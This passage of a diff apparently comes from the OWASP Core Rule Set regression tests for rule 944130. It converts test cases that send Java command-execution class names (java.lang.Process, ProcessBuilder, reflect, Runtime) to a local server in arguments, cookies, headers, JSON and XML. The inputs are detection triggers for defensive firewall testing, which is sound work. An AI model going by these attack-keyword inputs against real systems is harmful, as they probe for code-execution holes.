"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 318 desc: 
"Content-Type application/json arg value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log: + expect_ids: [944130] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 320 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 321 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 322 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 323 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 324 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 329 desc: 
"Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-331 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-332 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 332 desc: "Argument name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-333 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log: + expect_ids: [944130] + - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-334 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-335 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-336 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-337 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-338 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-339 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-340 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 340 desc: "Content-Type application/json arg value includes keyword 
java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-341 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log: + expect_ids: [944130] + - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-342 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-343 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-344 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944130] + - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-345 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 